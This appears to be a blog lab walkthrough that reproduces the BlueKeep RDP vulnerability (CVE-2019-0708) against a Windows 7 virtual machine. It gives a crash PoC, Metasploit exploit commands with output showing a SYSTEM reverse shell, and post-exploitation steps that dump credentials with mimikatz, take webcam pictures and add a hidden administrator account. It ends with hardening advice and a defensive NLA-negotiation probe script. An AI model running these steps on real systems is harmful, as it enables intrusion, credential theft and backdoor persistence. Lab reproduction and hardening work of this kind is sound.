Environment
Target: Windows 7 Ultimate SP1 x64
Attacker: Metasploit Framework (MSF)
Enable Remote Desktop on the target: [screenshot]
Disable the firewall on the target: [screenshot]
Exploitation
Early blue-screen PoC
This is the early PoC for the vulnerability: it only crashes the target (blue screen); it does not return a shell.
git clone https://github.com/n1xbyte/CVE-2019-0708.git
cd CVE-2019-0708
pip3 install impacket
python3 crashpoc.py 192.168.173.136 32   # python3 crashpoc.py <target IP> <system type>
[screenshot]
Note: this PoC crashes Win7 even with the target's firewall left on, because enabling Remote Desktop already opens TCP 3389 in Windows Firewall.
Getting a shell
Download the exploit modules (pinned to a specific Metasploit commit so the four files match each other):
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
Import the modules into the framework (these paths are for the Rapid7 omnibus installer under /opt/metasploit-framework; on Kali the framework lives under /usr/share/metasploit-framework, so adjust the destination accordingly):
cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
mkdir /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp
cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
Vulnerability detection:
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set rhosts 192.168.173.136
set threads 5
run
[*] 192.168.173.136:3389 - Detected RDP on 192.168.173.136:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.173.136:3389 - The target is vulnerable.
[*] 192.168.173.136:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Vulnerability exploitation:
reload_all   # reload modules so the newly copied exploit is picked up
search cve-2019-0708
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 192.168.173.136
set rport 3389
set target 3   # the target is a VMware VM, so target 3 (VMware) is used
exploit
[*] Started reverse TCP handler on 192.168.173.1:4444
[*] 192.168.173.136:3389 - Detected RDP on 192.168.173.136:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.173.136:3389 - The target is vulnerable.
[*] 192.168.173.136:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1.
[*] 192.168.173.136:3389 - Surfing channels ...
[*] 192.168.173.136:3389 - Lobbing eggs ...
[*] 192.168.173.136:3389 - Forcing the USE of FREE'd object ...
[*] Command shell session 3 opened (192.168.173.1:4444 -> 192.168.173.136:49161) at 2019-09-14 22:50:31 +0800
session 1
session 1
'session' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\system32>whoami
whoami
nt authority\system
# Shell obtained, running as NT AUTHORITY\SYSTEM (the "session 1" typed above went to the remote cmd.exe rather than to msfconsole, hence the error)
# The first exploit attempt blue-screened the Win7 target; the second attempt returned the shell normally
Meaning of the target values:
0  Automatic targeting via fingerprinting
1  Physical machine
2  VirtualBox VM
3  VMware VM
Post-exploitation (the shell already runs as SYSTEM, so no further privilege escalation is needed)
meterpreter > getuid          # show the user the session runs as
meterpreter > screenshot      # capture the desktop
meterpreter > webcam_snap     # take a webcam picture
meterpreter > load mimikatz   # load the mimikatz extension
meterpreter > wdigest         # dump credentials cached by the WDigest provider
rdesktop 192.168.173.138      # log in over Remote Desktop
net user root$ root /add                  # add a local user "root$" with password "root"
net localgroup administrators root$ /add  # add it to the local Administrators group
The test machine here is Win7. On Windows Server 2008 the following registry value must be changed first, otherwise the exploit blue-screens the target:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\RDP-Tcp\fDisableCam, set to 0
Hardening
Affected versions:
Windows Server 2008 (R2)
Windows 7 SP1
Windows Server 2003
Windows XP
Temporary hardening: block TCP port 3389 (Remote Desktop) at the firewall, or disable the service where it is not needed. Enabling Network Level Authentication (NLA) also removes the unauthenticated trigger, which is why the scanner output above reports a "Requires NLA" field.
Hot patch: see the Qi An Xin (奇安信) CVE-2019-0708 hotpatch tool user manual. The permanent fix is Microsoft's security update for CVE-2019-0708.
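Both the scanner output in the detection section ("Requires NLA: No") and the hardening advice above hinge on the same first exchange of every RDP session: the client's X.224 Connection Request carries an RDP_NEG_REQ naming the security protocols it accepts, and the server's Connection Confirm either picks one (RDP_NEG_RSP) or refuses (RDP_NEG_FAILURE). The script below is an added example written for this article; it is not code from the page, from the n1xbyte PoC or from Metasploit. It asks for standard RDP security (requestedProtocols = 0) and classifies the answer: a server that accepts is reachable without authentication, a server that answers HYBRID_REQUIRED_BY_SERVER enforces NLA, and a blocked port (the temporary hardening) fails at TCP connect. Frame layouts follow MS-RDPBCGR 2.2.1.1 and 2.2.1.2; the function names and the three sample frames are this example's own (constructed, not captured from a real host), and the Metasploit module's exact decision logic is assumed to be equivalent, not copied. The probe stays at the X.224 layer and never opens the MS_T120 channel, so it neither tests for the vulnerability itself nor risks crashing the target.

```python
"""
rdp_neg_probe.py - the X.224 Connection Request / Confirm exchange behind the
"Requires NLA" field. Added example for this article; not code from the page,
from the n1xbyte PoC or from Metasploit. Frame layouts follow MS-RDPBCGR
2.2.1.1 (Client X.224 Connection Request) and 2.2.1.2 (Server X.224 Connection
Confirm). Function names and the sample frames are this example's own.
"""
import socket
import struct
import sys

# RDP_NEG_REQ.requestedProtocols flags (MS-RDPBCGR 2.2.1.1.1)
PROTOCOL_RDP = 0x00000000     # standard (legacy) RDP security
PROTOCOL_SSL = 0x00000001     # TLS
PROTOCOL_HYBRID = 0x00000002  # CredSSP, i.e. NLA

TYPE_RDP_NEG_RSP = 0x02       # server accepted one of the requested protocols
TYPE_RDP_NEG_FAILURE = 0x03   # server refused; payload is a failure code

# RDP_NEG_FAILURE.failureCode values (MS-RDPBCGR 2.2.1.2.2)
FAILURE_CODES = {
    1: "SSL_REQUIRED_BY_SERVER",
    2: "SSL_NOT_ALLOWED_BY_SERVER",
    3: "SSL_CERT_NOT_ON_SERVER",
    4: "INCONSISTENT_FLAGS",
    5: "HYBRID_REQUIRED_BY_SERVER",   # NLA enforced on the server
    6: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER",
}


def build_connection_request(requested=PROTOCOL_RDP, cookie=b"mstshash=user"):
    """TPKT header + X.224 CR TPDU + routing cookie + RDP_NEG_REQ."""
    neg_req = struct.pack("<BBHI", 0x01, 0x00, 8, requested)  # type, flags, length, protocols
    # CR code 0xE0, DST-REF (2), SRC-REF (2), class option (1), then the variable part
    x224 = b"\xe0\x00\x00\x00\x00\x00" + b"Cookie: " + cookie + b"\r\n" + neg_req
    x224 = bytes([len(x224)]) + x224                           # LI counts everything after itself
    tpkt = struct.pack(">BBH", 0x03, 0x00, 4 + len(x224))      # version 3, reserved, total length
    return tpkt + x224


def parse_connection_confirm(data):
    """Decode a Connection Confirm into {'accepted', 'selected', 'failure'}."""
    if len(data) < 11 or data[0] != 0x03:
        raise ValueError("not a TPKT frame")
    if struct.unpack(">H", data[2:4])[0] != len(data):
        raise ValueError("TPKT length does not match frame")
    if data[5] & 0xF0 != 0xD0:                                 # CC TPDU code
        raise ValueError("not an X.224 Connection Confirm")
    if len(data) == 11:
        # No RDP_NEG_RSP at all: old server that only speaks standard RDP security
        return {"accepted": True, "selected": PROTOCOL_RDP, "failure": None}
    ntype, _flags, nlen, value = struct.unpack("<BBHI", data[11:19])
    if nlen != 8:
        raise ValueError("bad RDP negotiation structure length")
    if ntype == TYPE_RDP_NEG_RSP:
        return {"accepted": True, "selected": value, "failure": None}
    if ntype == TYPE_RDP_NEG_FAILURE:
        return {"accepted": False, "selected": None,
                "failure": FAILURE_CODES.get(value, "UNKNOWN_%d" % value)}
    raise ValueError("unexpected negotiation type 0x%02x" % ntype)


def classify(confirm):
    """Verdict for a Connection Confirm that answered a PROTOCOL_RDP request."""
    c = parse_connection_confirm(confirm)
    if c["accepted"]:
        return "no-nla"           # standard RDP security accepted: no pre-auth gate
    if c["failure"] == "HYBRID_REQUIRED_BY_SERVER":
        return "nla-required"     # what the scanner prints as "Requires NLA: Yes"
    return "refused:" + c["failure"]


def probe(host, port=3389, timeout=5.0):
    """Live check: a TCP failure means the port is filtered or closed (the
    temporary hardening); any Connection Confirm is classified as above."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_connection_request(PROTOCOL_RDP))
            data = s.recv(1024)
    except OSError:
        return "closed"
    return classify(data) if data else "no-response"


# Constructed sample Connection Confirm frames (not captured from a real host)
SAMPLE_NO_NLA = bytes.fromhex("030000130ed000001234000200080000000000")        # RDP_NEG_RSP, selected 0
SAMPLE_NLA_REQUIRED = bytes.fromhex("030000130ed000001234000300080005000000")  # RDP_NEG_FAILURE, code 5
SAMPLE_LEGACY = bytes.fromhex("0300000b06d00000123400")                        # bare CC, no negotiation

if __name__ == "__main__":
    for name, frame in (("no NLA", SAMPLE_NO_NLA),
                        ("NLA required", SAMPLE_NLA_REQUIRED),
                        ("legacy", SAMPLE_LEGACY)):
        print("%-13s -> %s" % (name, classify(frame)))
    if len(sys.argv) > 1:                     # e.g. python3 rdp_neg_probe.py 192.168.173.136
        print(sys.argv[1], "->", probe(sys.argv[1]))
```

Run with no arguments to see the three constructed frames classified; pass a lab host to run the live probe. After applying the hardening, the expected result is "closed" (port blocked) or "nla-required" (NLA enforced); "no-nla" means the unauthenticated path the exploit above relies on is still open, regardless of whether the host is patched.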
Original article by 小嵘源码. If you repost it, please credit the source: https://www.lcpttec.com/bluekeep/